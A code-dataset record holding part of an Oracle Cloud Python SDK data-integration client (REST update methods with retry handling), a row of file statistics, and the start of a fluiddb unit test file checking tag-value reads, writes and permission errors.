:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_schedule.py.html>`__ to see an example of how to use update_schedule API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/schedules/{scheduleKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_schedule got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"scheduleKey": schedule_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_schedule_details,
response_type="Schedule")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_schedule_details,
response_type="Schedule")
def update_task(self, workspace_id, task_key, update_task_details, **kwargs):
"""
Updates a specific task. For example, you can update the task description or move the task to a different folder by changing the `aggregatorKey` to a different folder in the registry.
:param str workspace_id: (required)
The workspace ID.
:param str task_key: (required)
The task key.
:param oci.data_integration.models.UpdateTaskDetails update_task_details: (required)
The details needed to update a task.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Task`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_task.py.html>`__ to see an example of how to use update_task API.
"""
resource_path = "/workspaces/{workspaceId}/tasks/{taskKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_task got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskKey": task_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_task_details,
response_type="Task")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_task_details,
response_type="Task")
def update_task_run(self, workspace_id, application_key, task_run_key, update_task_run_details, **kwargs):
"""
Updates the status of the task run. For example, aborts a task run.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str task_run_key: (required)
The task run key.
:param oci.data_integration.models.UpdateTaskRunDetails update_task_run_details: (required)
The details needed to update the status of a task run.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.TaskRunDetails`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_task_run.py.html>`__ to see an example of how to use update_task_run API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/taskRuns/{taskRunKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"if_match"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_task_run got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"taskRunKey": task_run_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing),
"if-match": kwargs.get("if_match", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_task_run_details,
response_type="TaskRunDetails")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_task_run_details,
response_type="TaskRunDetails")
def update_task_schedule(self, workspace_id, application_key, task_schedule_key, update_task_schedule_details, **kwargs):
"""
Endpoint used to update the TaskSchedule
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str task_schedule_key: (required)
TaskSchedule Key
:param oci.data_integration.models.UpdateTaskScheduleDetails update_task_schedule_details: (required)
Request body parameter for TaskSchedule details
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.TaskSchedule`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_task_schedule.py.html>`__ to see an example of how to use update_task_schedule API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/taskSchedules/{taskScheduleKey}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_task_schedule got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"taskScheduleKey": task_schedule_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_task_schedule_details,
response_type="TaskSchedule")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_task_schedule_details,
response_type="TaskSchedule")
def update_workspace(self, workspace_id, update_workspace_details, **kwargs):
"""
Updates the specified Data Integration workspace.
:param str workspace_id: (required)
The workspace ID.
:param oci.data_integration.models.UpdateWorkspaceDetails update_workspace_details: (required)
The information needed to update the workspace.
:param str if_match: (optional)
For optimistic concurrency control. In the PUT or DELETE call for a resource, set the `if-match` parameter to the value of the `etag` from a previous GET or POST response for that resource.
The resource will be updated or deleted only if the `etag` you provide matches the resource's current `etag` value.
When 'if-match' is provided and its value does not exactly match the 'etag' of the resource on the server, the request fails with the 412 response code.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Workspace`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/update_workspace.py.html>`__ to see an example of how to use update_workspace API.
"""
resource_path = "/workspaces/{workspaceId}"
method = "PUT"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"if_match",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"update_workspace got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"if-match": kwargs.get("if_match", missing),
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_workspace_details,
response_type="Workspace")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
body=update_workspace_details,
response_type="Workspace")
| 46.747733
| 521
| 0.635454
| 67,283
| 541,292
| 4.951607
| 0.010419
| 0.057555
| 0.015992
| 0.007648
| 0.965014
| 0.960178
| 0.956057
| 0.948646
| 0.940464
| 0.930265
| 0
| 0.000805
| 0.277438
| 541,292
| 11,578
| 522
| 46.751771
| 0.851009
| 0.424019
| 0
| 0.875921
| 0
| 0
| 0.174628
| 0.031757
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018754
| false
| 0.000167
| 0.001507
| 0
| 0.057602
| 0.000167
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
295fa5afa1442a314e0a9575d1add8580a4a22c2
| 80,936
|
py
|
Python
|
fluiddb/api/test/test_value.py
|
fluidinfo/fluiddb
|
b5a8c8349f3eaf3364cc4efba4736c3e33b30d96
|
[
"Apache-2.0"
] | 3
|
2021-05-10T14:41:30.000Z
|
2021-12-16T05:53:30.000Z
|
fluiddb/api/test/test_value.py
|
fluidinfo/fluiddb
|
b5a8c8349f3eaf3364cc4efba4736c3e33b30d96
|
[
"Apache-2.0"
] | null | null | null |
fluiddb/api/test/test_value.py
|
fluidinfo/fluiddb
|
b5a8c8349f3eaf3364cc4efba4736c3e33b30d96
|
[
"Apache-2.0"
] | 2
|
2018-01-24T09:03:21.000Z
|
2021-06-25T08:34:54.000Z
|
# -*- coding: utf-8 -*-
from json import loads
from uuid import uuid4, UUID
from twisted.internet.defer import inlineCallbacks
from fluiddb.api.facade import Facade
from fluiddb.application import FluidinfoSessionFactory
from fluiddb.common.types_thrift.ttypes import (
TNonexistentTag, TPathPermissionDenied, TNoInstanceOnObject, TBadRequest,
TParseError, TInvalidPath)
from fluiddb.api.value import TagPathAndValue
from fluiddb.data.permission import Operation, Policy
from fluiddb.data.system import createSystemData
from fluiddb.data.tag import getTags
from fluiddb.data.value import createTagValue, getTagValues
from fluiddb.cache.permission import CachingPermissionAPI
from fluiddb.model.tag import TagAPI
from fluiddb.model.user import UserAPI, getUser
from fluiddb.model.value import TagValueAPI, FluidinfoTagValue
from fluiddb.security.tag import SecureTagAPI
from fluiddb.security.value import SecureTagValueAPI
from fluiddb.testing.resources import (
CacheResource, ConfigResource, DatabaseResource, IndexResource,
LoggingResource, ThreadPoolResource)
from fluiddb.testing.basic import FluidinfoTestCase
from fluiddb.testing.session import login
from fluiddb.testing.solr import runDataImportHandler
from fluiddb.util.transact import Transact
from fluiddb.web.query import (
createBinaryThriftValue, createThriftValue, guessValue)
from fluiddb.web.values import ValuesQuerySchema
class FacadeTagValueMixinTest(FluidinfoTestCase):
resources = [('cache', CacheResource()),
('config', ConfigResource()),
('log', LoggingResource()),
('store', DatabaseResource()),
('threadPool', ThreadPoolResource())]
def setUp(self):
super(FacadeTagValueMixinTest, self).setUp()
createSystemData()
self.transact = Transact(self.threadPool)
factory = FluidinfoSessionFactory('API-9000')
self.facade = Facade(self.transact, factory)
UserAPI().create([(u'username', u'password', u'User',
u'user@example.com')])
self.user = getUser(u'username')
self.permissions = CachingPermissionAPI(self.user)
@inlineCallbacks
def testGetTagInstanceWithUnknownTag(self):
"""
L{FacadeTagValueMixin.getTagInstance} raises a L{TNoInstanceOnObject}
exception if the specified L{Tag.path} doesn't exist.
"""
objectID = uuid4()
self.store.commit()
with login(u'username', objectID, self.transact) as session:
deferred = self.facade.getTagInstance(session, u'unknown/path',
str(objectID))
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual(u'unknown/path', error.path)
@inlineCallbacks
def testGetTagInstanceWithUnknownObjectID(self):
"""
L{FacadeTagValueMixin.getTagInstance} raises a L{TNoInstanceOnObject}
exception if the specified object ID doesn't exist.
"""
objectID = uuid4()
TagAPI(self.user).create([(u'username/tag', u'description')])
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.getTagInstance(session, u'username/tag',
str(objectID))
error = yield self.assertFailure(deferred, TNoInstanceOnObject)
self.assertEqual(u'username/tag', error.path)
self.assertEqual(str(objectID), error.objectId)
@inlineCallbacks
def testGetTagInstancePermissionDenied(self):
result = TagAPI(self.user).create([(u'username/tag', u'description')])
[(objectID, _)] = result
TagValueAPI(self.user).set({objectID: {u'username/tag': False}})
permissions = CachingPermissionAPI(self.user)
permissions.set([(u'username/tag', Operation.READ_TAG_VALUE,
Policy.OPEN, [u'username'])])
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.getTagInstance(session, u'username/tag',
str(objectID))
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual(u'username/tag', error.path)
@inlineCallbacks
def testGetTagInstanceReturnsTagValue(self):
"""
L{FacadeTagValueMixin.getTagInstance} returns the L{TagValue}
object in addition to the Thrift value.
"""
result = TagAPI(self.user).create([(u'username/tag', u'description')])
[(objectID, path)] = result
TagValueAPI(self.user).set({objectID: {u'username/tag': None}})
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
value, tagValue = yield self.facade.getTagInstance(
session, u'username/tag', str(objectID))
self.assertEqual(None, guessValue(value))
self.assertEqual(FluidinfoTagValue, type(tagValue))
@inlineCallbacks
def testGetTagInstanceWithNoneValue(self):
"""
L{FacadeTagValueMixin.getTagInstance} returns a Thrift value for the
specified L{Tag.path} and object ID.
"""
result = TagAPI(self.user).create([(u'username/tag', u'description')])
[(objectID, path)] = result
TagValueAPI(self.user).set({objectID: {u'username/tag': None}})
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
value, tagValue = yield self.facade.getTagInstance(
session, u'username/tag', str(objectID))
self.assertEqual(None, guessValue(value))
@inlineCallbacks
def testGetTagInstanceWithBoolValue(self):
"""
L{FacadeTagValueMixin.getTagInstance} returns a Thrift value for the
specified L{Tag.path} and object ID.
"""
result = TagAPI(self.user).create([(u'username/tag', u'description')])
[(objectID, path)] = result
TagValueAPI(self.user).set({objectID: {u'username/tag': False}})
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
value, tagValue = yield self.facade.getTagInstance(
session, u'username/tag', str(objectID))
self.assertEqual(False, guessValue(value))
@inlineCallbacks
def testGetTagInstanceWithIntValue(self):
"""
L{FacadeTagValueMixin.getTagInstance} returns a Thrift value for the
specified L{Tag.path} and object ID.
"""
result = TagAPI(self.user).create([(u'username/tag', u'description')])
[(objectID, path)] = result
TagValueAPI(self.user).set({objectID: {u'username/tag': 42}})
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
value, tagValue = yield self.facade.getTagInstance(
session, u'username/tag', str(objectID))
self.assertEqual(42, guessValue(value))
@inlineCallbacks
def testGetTagInstanceWithFloatValue(self):
"""
L{FacadeTagValueMixin.getTagInstance} returns a Thrift value for the
specified L{Tag.path} and object ID.
"""
result = TagAPI(self.user).create([(u'username/tag', u'description')])
[(objectID, path)] = result
TagValueAPI(self.user).set({objectID: {u'username/tag': 42.1}})
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
value, tagValue = yield self.facade.getTagInstance(
session, u'username/tag', str(objectID))
self.assertEqual(42.1, guessValue(value))
@inlineCallbacks
def testGetTagInstanceWithUnicodeValue(self):
"""
L{FacadeTagValueMixin.getTagInstance} returns a Thrift value for the
specified L{Tag.path} and object ID.
"""
result = TagAPI(self.user).create([(u'username/tag', u'description')])
[(objectID, path)] = result
TagValueAPI(self.user).set({objectID: {u'username/tag': u'value'}})
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
value, tagValue = yield self.facade.getTagInstance(
session, u'username/tag', str(objectID))
self.assertEqual(u'value', guessValue(value))
@inlineCallbacks
def testGetTagInstanceWithSetValue(self):
"""
L{FacadeTagValueMixin.getTagInstance} returns a Thrift value for the
specified L{Tag.path} and object ID.
"""
result = TagAPI(self.user).create([(u'username/tag', u'description')])
[(objectID, path)] = result
TagValueAPI(self.user).set(
{objectID: {u'username/tag': [u'foo', u'bar']}})
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
value, tagValue = yield self.facade.getTagInstance(
session, u'username/tag', str(objectID))
self.assertEqual([u'foo', u'bar'], guessValue(value))
@inlineCallbacks
def testGetTagInstanceWithBinaryValue(self):
"""
L{FacadeTagValueMixin.getTagInstance} returns a Thrift value for the
specified L{Tag.path} and object ID.
"""
TagAPI(self.user).create([(u'username/tag', u'description')])
objectID = uuid4()
thriftValue = createBinaryThriftValue('Hello, world!', 'text/plain')
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
yield self.facade.setTagInstance(session, u'username/tag',
str(objectID), thriftValue)
value, tagValue = yield self.facade.getTagInstance(
session, u'username/tag', str(objectID))
self.assertEqual('Hello, world!', value.binaryKey)
self.assertEqual('text/plain', value.binaryKeyMimeType)
@inlineCallbacks
def testGetTagInstanceWithFluidDBID(self):
"""
L{FacadeTagValueMixin.getTagInstance} correctly returns object IDs
when the C{fluiddb/id} L{Tag} is requested.
"""
TagAPI(self.user).create([(u'username/tag', u'description')])
objectID = uuid4()
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
thriftValue = createBinaryThriftValue('Hello, world!',
'text/plain')
yield self.facade.setTagInstance(session, u'username/tag',
str(objectID), thriftValue)
value, tagValue = yield self.facade.getTagInstance(
session, u'fluiddb/id', str(objectID))
self.assertEqual(str(objectID), guessValue(value))
@inlineCallbacks
def testSetTagInstanceWithUnknownTag(self):
"""
L{FacadeTagValueMixin.setTagInstance} raises a
L{TNonexistentTag} exception if the requested L{Tag.path}
doesn't exist and the user doesn't have permission to create it.
"""
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
thriftValue = createThriftValue(42)
deferred = self.facade.setTagInstance(session, u'unknown/path',
str(uuid4()), thriftValue)
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual(u'unknown/path', error.path)
@inlineCallbacks
def testSetTagInstanceWithImplicitTag(self):
"""
L{FacadeTagValueMixin.setTagInstance} implicitly creates a L{Tag} if
the L{User} making the request has permission to do so.
"""
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
thriftValue = createThriftValue(42)
objectID = uuid4()
yield self.facade.setTagInstance(session, u'username/unknown',
str(objectID), thriftValue)
value, tagValue = yield self.facade.getTagInstance(
session, u'username/unknown', str(objectID))
self.assertEqual(42, guessValue(value))
@inlineCallbacks
def testSetTagInstanceWithImplicitTagWithMalformedPath(self):
"""
L{FacadeTagValueMixin.setTagInstance} raises L{TInvalidPath} if one of
the paths for a nonexistent L{Tag} is malformed.
"""
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
thriftValue = createThriftValue(42)
objectID = uuid4()
deferred = self.facade.setTagInstance(session, u'username/$bad!',
str(objectID), thriftValue)
yield self.assertFailure(deferred, TInvalidPath)
@inlineCallbacks
def testSetTagInstancePermissionDenied(self):
"""
L{FacadeTagValueMixin.setTagInstance} raises a
L{TPathPermissionDenied} exception if the user doesn't have
C{Operation.WRITE_TAG_VALUE} permission.
"""
UserAPI().create([(u'fred', u'password', u'Fred',
u'fred@example.com')])
user = getUser(u'username')
permissions = CachingPermissionAPI(user)
TagAPI(user).create([(u'fred/bar', u'description')])
values = [(u'fred/bar', Operation.WRITE_TAG_VALUE,
Policy.CLOSED, [u'fred'])]
permissions.set(values)
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
thriftValue = createThriftValue(42)
deferred = self.facade.setTagInstance(session, u'fred/bar',
str(uuid4()), thriftValue)
error = yield self.assertFailure(deferred, TPathPermissionDenied)
self.assertEqual(u'tag-values', error.category)
self.assertEqual('write', error.action)
self.assertEqual(u'fred/bar', error.path)
@inlineCallbacks
def testSetTagInstanceWithNoneValue(self):
"""L{FacadeTagValueMixin.setTagInstance} can store a C{None}."""
TagAPI(self.user).create([(u'username/bar', u'description')])
tag = getTags(paths=[u'username/bar']).one()
objectID = uuid4()
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
thriftValue = createThriftValue(None)
yield self.facade.setTagInstance(session, u'username/bar',
str(objectID), thriftValue)
self.store.rollback()
value = getTagValues(values=[(objectID, tag.id)]).one()
self.assertIdentical(self.user, value.creator)
self.assertEqual(objectID, value.objectID)
self.assertEqual(None, value.value)
@inlineCallbacks
def testSetTagInstanceWithBoolValue(self):
"""L{FacadeTagValueMixin.setTagInstance} can store a C{bool}."""
TagAPI(self.user).create([(u'username/bar', u'description')])
tag = getTags(paths=[u'username/bar']).one()
objectID = uuid4()
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
thriftValue = createThriftValue(True)
yield self.facade.setTagInstance(session, u'username/bar',
str(objectID), thriftValue)
self.store.rollback()
value = getTagValues(values=[(objectID, tag.id)]).one()
self.assertIdentical(self.user, value.creator)
self.assertEqual(objectID, value.objectID)
self.assertEqual(True, value.value)
@inlineCallbacks
def testSetTagInstanceWithIntValue(self):
"""L{FacadeTagValueMixin.setTagInstance} can store an C{int}."""
TagAPI(self.user).create([(u'username/bar', u'description')])
tag = getTags(paths=[u'username/bar']).one()
objectID = uuid4()
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
thriftValue = createThriftValue(42)
yield self.facade.setTagInstance(session, u'username/bar',
str(objectID), thriftValue)
self.store.rollback()
value = getTagValues(values=[(objectID, tag.id)]).one()
self.assertIdentical(self.user, value.creator)
self.assertEqual(objectID, value.objectID)
self.assertEqual(42, value.value)
@inlineCallbacks
def testSetTagInstanceWithFloatValue(self):
"""L{FacadeTagValueMixin.setTagInstance} can store a C{float}."""
TagAPI(self.user).create([(u'username/bar', u'description')])
tag = getTags(paths=[u'username/bar']).one()
objectID = uuid4()
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
thriftValue = createThriftValue(42.31)
yield self.facade.setTagInstance(session, u'username/bar',
str(objectID), thriftValue)
self.store.rollback()
value = getTagValues(values=[(objectID, tag.id)]).one()
self.assertIdentical(self.user, value.creator)
self.assertEqual(objectID, value.objectID)
self.assertEqual(42.31, value.value)
@inlineCallbacks
def testSetTagInstanceWithUnicodeValue(self):
"""
L{FacadeTagValueMixin.setTagInstance} can store a C{unicode} string.
"""
TagAPI(self.user).create([(u'username/bar', u'description')])
tag = getTags(paths=[u'username/bar']).one()
objectID = uuid4()
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
thriftValue = createThriftValue(u'foo bar')
yield self.facade.setTagInstance(session, u'username/bar',
str(objectID), thriftValue)
self.store.rollback()
value = getTagValues(values=[(objectID, tag.id)]).one()
self.assertIdentical(self.user, value.creator)
self.assertEqual(objectID, value.objectID)
self.assertEqual(u'foo bar', value.value)
@inlineCallbacks
def testSetTagInstanceWithSetValue(self):
"""
L{FacadeTagValueMixin.setTagInstance} can store a C{set} of C{unicode}
strings.
"""
TagAPI(self.user).create([(u'username/bar', u'description')])
tag = getTags(paths=[u'username/bar']).one()
objectID = uuid4()
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
thriftValue = createThriftValue([u'foo', u'bar'])
yield self.facade.setTagInstance(session, u'username/bar',
str(objectID), thriftValue)
self.store.rollback()
value = getTagValues(values=[(objectID, tag.id)]).one()
self.assertIdentical(self.user, value.creator)
self.assertEqual(objectID, value.objectID)
self.assertEqual([u'foo', u'bar'], value.value)
@inlineCallbacks
def testSetTagInstanceWithBinaryValue(self):
"""
L{FacadeTagValueMixin.setTagInstance} can store a binary L{TagValue}.
"""
TagAPI(self.user).create([(u'username/bar', u'description')])
objectID = uuid4()
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
thriftValue = createBinaryThriftValue('Hello, world!',
'text/plain')
yield self.facade.setTagInstance(session, u'username/bar',
str(objectID), thriftValue)
value, tagValue = yield self.facade.getTagInstance(
session, u'username/bar', str(objectID))
self.assertEqual('text/plain', value.binaryKeyMimeType)
self.assertEqual('Hello, world!', value.binaryKey)
@inlineCallbacks
def testHasTagInstanceUnknownTag(self):
"""
L{FacadeTagValueMixin.hasTagInstance} raises a L{TNonexistentTag}
exception if the requested L{Tag.path} doesn't exist.
"""
self.store.commit()
with login(u'username', uuid4(), self.transact) as session:
deferred = self.facade.hasTagInstance(session, u'username/unknown',
str(uuid4()))
error = yield self.assertFailure(deferred, TNonexistentTag)
self.assertEqual(u'username/unknown', error.path)
@inlineCallbacks
def testHasTagInstancePermissionDenied(self):
"""
L{FacadeTagValueMixin.hasTagInstance} raises a
L{TNonexistentTag} exception if the user doesn't have
C{Operation.READ_TAG_VALUE} permission.
"""
UserAPI().create([(u'fred', u'password', u'User',
u'fred@example.com')])
user = getUser(u'username')
permissions = CachingPermissionAPI(user)
TagAPI(user).create([(u'fred/bar', u'description')])
tag = getTags(paths=[u'fred/bar']).one()
values = [(u'fred/bar', Operation.READ_TAG_VALUE, Policy.CLOSED,
[u'fred'])]
permissions.set(values)
